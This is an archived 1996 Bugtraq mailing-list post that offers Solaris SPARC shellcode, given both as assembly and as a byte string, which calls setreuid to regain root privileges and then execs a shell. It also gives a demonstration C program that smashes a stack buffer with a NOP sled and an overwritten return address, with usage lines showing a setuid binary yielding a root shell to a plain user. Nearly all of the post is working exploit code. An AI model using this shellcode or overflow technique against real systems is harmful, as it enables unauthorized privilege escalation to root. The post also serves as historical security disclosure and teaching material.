Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: /bin/ksh sparc code

From: aaronb () j51 com (Aaron Bornstein)
Date: Tue, 3 Dec 1996 15:18:19 -0500

Our good buddy Kichang wrote the following:

So, I made sparc code for doing something *like* execl("/bin/ksh","ksh",0).
I know it's no big deal, almost close to lame,  but I think it's kinda


        That's one way to do it, but I don't like ksh.  So, I decided to
modify it to do a setreuid() call before anything else.  Here's the code:

        --CUT HERE--solaris-setreuid-shellcode.c--CUT HERE--
/* Solaris */
main() {
__asm__ (
        "mov     0xca, %g1 \n"          /* 202 - setreuid() */
        "xor     %o1,%o1,%o1 \n"
        "and     %o1,%o1,%o0 \n"
        "ta      8 \n"
        "sethi   0xbd89a, %l6 \n"
        "or      %l6, 0x16e, %l6 \n"
        "sethi   0xbdcda, %l7 \n"
        "and     %sp, %sp, %o0 \n"
        "add     %sp, 8, %o1 \n"
        "xor     %o2, %o2, %o2 \n"
        "add     %sp, 16, %sp \n"
        "std     %l6, [%sp - 16] \n"
        "st      %sp, [%sp - 8] \n"
        "st      %g0, [%sp - 4] \n"
        "mov     0x3b, %g1 \n"          /* 59 - execve() */
        "ta      8 \n"
        );
}
        --CUT HERE--solaris-setreuid-shellcode.c--CUT HERE--


        And a demonstration program.  Usage:

# cc -o demo demo.c
# chmod 4755 demo
# su plainuser
% ./demo
#

        --CUT HERE--solaris-shellcode-example1.c--CUT HERE--
#include <sys/types.h>

#define NOP      0xa61cc013
#define BUFSIZE  256
#define CODESIZE 64

char shellcode[] =
"\x82\x10\x20\xca\x92\x1a\x40\x09\x90\x0a\x40\x09\x91\xd0\x20\x08"
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08";


char bigbuf[BUFSIZE * 2];

u_long
get_sp()
{
  __asm__("mov %sp, %i0 \n");
}

void
overflow_me()
{
  char    lilbuf[BUFSIZE];
  u_long  *lp;
  char    *cp;
  int     i;

  lp = (u_long *)bigbuf;

  for (i = 0 ; i < BUFSIZE - CODESIZE ; i += 4)
    *lp++ = NOP;

  cp = (char *)lp;

  for (i = 0 ; i < CODESIZE ; i++)
    *cp++ = shellcode[i];

  lp = (u_long *)cp;
  for (i = BUFSIZE ; i < BUFSIZE * 2 ; i += 4)
/*    *lp++ = (u_long)lilbuf;   */
    *lp++ = get_sp() + 224;

  strcpy(lilbuf, bigbuf);
}

void
main(int argc, char **argv)
{
  overflow_me();
}
        --CUT HERE--solaris-shellcode-example1.c--CUT HERE--
Previous By Date Next
Previous By Thread Next

Current thread: